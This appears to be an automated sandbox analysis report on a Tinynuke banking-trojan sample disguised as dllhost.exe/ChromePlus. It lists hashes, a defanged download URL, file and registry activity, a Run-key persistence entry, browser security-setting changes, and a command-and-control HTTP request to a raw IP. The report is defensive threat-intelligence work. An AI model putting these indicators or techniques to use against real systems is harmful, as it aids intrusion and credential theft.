MalScore
100/100
MalFamily
Tinynuke

dllhost.exe

File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 191.50 KB (196096 bytes)
Compile time: 2018-04-24 08:12:01
MD5: 6157b1b75158a6aab48926690638378b
SHA1: 7a13127b7e2d5772a941a0e4789d6f2ea7e40ea4
SHA256: c756c00dc87c29e1e5c9a70dc48ca913d103d0b4335b994a2cd25a1dfed3b9dc
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-04-27 22:36:03
Last submission: 2018-04-27 22:36:03
Filename detected: - dllhost.exe (1)
URL file hosting
hXXp://chanvribloc.com/dllhost.exe
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-27 14:00:19 [27/67] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x273f4 160768 940df3006a56a63282aa016273ae29e7 d87a0c7f882c61e3efa7a5fa3653d2591ee3ee71
.rsrc 0x2a000 0x84b0 34304 ab59be4002d66cba09dfb46e2df691a1 d0b04adad22a23333574d4a8308066e7a07be1f7
.reloc 0x34000 0xc 512 7dc9b89d7b602e5dbebe9b9f5beeba43 9a0576474d53199a262766043f845e32e4d84e56
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x2dc48 16936 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x31e70 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x32238 628 LANG_ENGLISH SUBLANG_ENGLISH_AUS
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright (C) 2009-2011 Maple Studio. All Rights Reserved.
InternalName: chrome_exe
CompanyShortName: Maple Studio
FileVersion: 0.0.0.0
CompanyName: Maple Studio
ProductShortName: ChromePlus
ProductName: ChromePlus
ProductVersion: 0.0.0.0
FileDescription: ChromePlus
Translation: 0x0409 0x04b0
OriginalFilename: chrome.exe
Official Build: 0
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
KERNEL32.dll
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 22:33:08 2018-04-27 22:35:59 171

13 Behaviors detected by system signatures

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe.config
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\dllhost.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources\ju2.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources\ju2.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2380.20441734
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2380.20441734
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2380.20441781
C:\
C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF22127370785
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe.config
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.INI
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2756.20443593
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2756.20443593
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2756.20443609
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\Profiles.ini
C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF2212737078532

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe.config
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe.config
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\Profiles.ini
C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF2212737078532

Write Files

C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF22127370785
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2380.20441734
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2380.20441734
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2380.20441781
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2756.20443593
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2756.20443593
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2756.20443609

Keys


Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00FD76B72EDDF22127370785\xe3\x8c\xb7
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
FD76B72EDDF22127370785

Resolved APIs

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\dllhost.exe"
"C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe"

Started Services

Nothing to display

Created Services

Nothing to display

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 22:33:08 2018-04-27 22:35:59 171

2 HTTP Request(s) detected

http://45.63.40.19/p3n3l3rk/client.php?FD76B72EDDF22127370785
  • Hostname: 45.63.40.19
  • IP Address:
  • Port: 80
  • Count: 1

